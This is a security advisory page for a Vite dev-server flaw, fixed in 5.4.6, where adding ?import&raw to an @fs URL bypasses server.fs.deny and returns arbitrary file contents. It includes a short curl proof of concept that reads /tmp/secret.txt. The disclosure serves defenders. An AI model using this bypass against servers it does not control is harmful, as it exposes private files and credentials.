CGA-2rrm-cfwm-848j

Published

Last updated

https://images.chainguard.dev/security/CGA-2rrm-cfwm-848j

Package

vite

Latest Update

Fixed

Fixed Version

5.4.6-r0

Aliases

Severity

5.3

Medium

CVSS V3

Summary

Vite's server.fs.deny is bypassed when using ?import&raw

Description

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC


$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

References

Updates

Advisories are based on vulnerability information provided by Grype from Anchore. Learn how Chainguard creates security advisories.

Safe Source for Open Source™

Media Kit Contact Us

Private Policy

CGA-2rrm-cfwm-848j

Severity

Summary

Description

Summary

Details

PoC

References

Updates

Product

Why Chainguard

Customers

Company

Resources